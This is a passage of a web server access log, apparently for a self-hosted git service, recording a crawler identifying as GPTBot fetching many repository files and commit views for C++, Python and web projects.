like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/bearing.png" +[17/Feb/2026:18:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/reactor.png" +[17/Feb/2026:18:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12062] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10985] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12062] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12061] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12063] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12061] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12064] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12060] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12064] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12067] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:02:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11719] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/package.json" +[17/Feb/2026:18:02:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/tags" [Client 74.7.227.38] [Length 7739] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:18:02:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" +[17/Feb/2026:18:02:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" +[17/Feb/2026:18:02:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11420] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" +[17/Feb/2026:18:02:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11393] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" +[17/Feb/2026:18:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" +[17/Feb/2026:18:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" +[17/Feb/2026:18:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/PythonTest/import%20sys.py" +[17/Feb/2026:18:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" +[17/Feb/2026:18:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" +[17/Feb/2026:18:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11420] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest/import%20sys.py" +[17/Feb/2026:18:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest/import%20sys.py" +[17/Feb/2026:18:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" +[17/Feb/2026:18:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10983] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:18:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11371] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:18:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11083] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13009] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/cmake_install.cmake" +[17/Feb/2026:18:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" +[17/Feb/2026:18:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/package.json" +[17/Feb/2026:18:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/package.json" +[17/Feb/2026:18:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/package.json" +[17/Feb/2026:18:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/package.json" +[17/Feb/2026:18:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt?display=source" [Client 74.7.227.38] [Length 11320] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:18:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj?display=source" [Client 74.7.227.38] [Length 11732] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:18:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2frequirements.txt" [Client 74.7.227.38] [Length 20406] [Gzip 3.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/requirements.txt" +[17/Feb/2026:18:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibpq.dll" [Client 74.7.227.38] [Length 23751] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libpq.dll" +[17/Feb/2026:18:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fReadMe.txt" [Client 74.7.227.38] [Length 19960] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:18:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fchromedriver.exe" [Client 74.7.227.38] [Length 23789] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 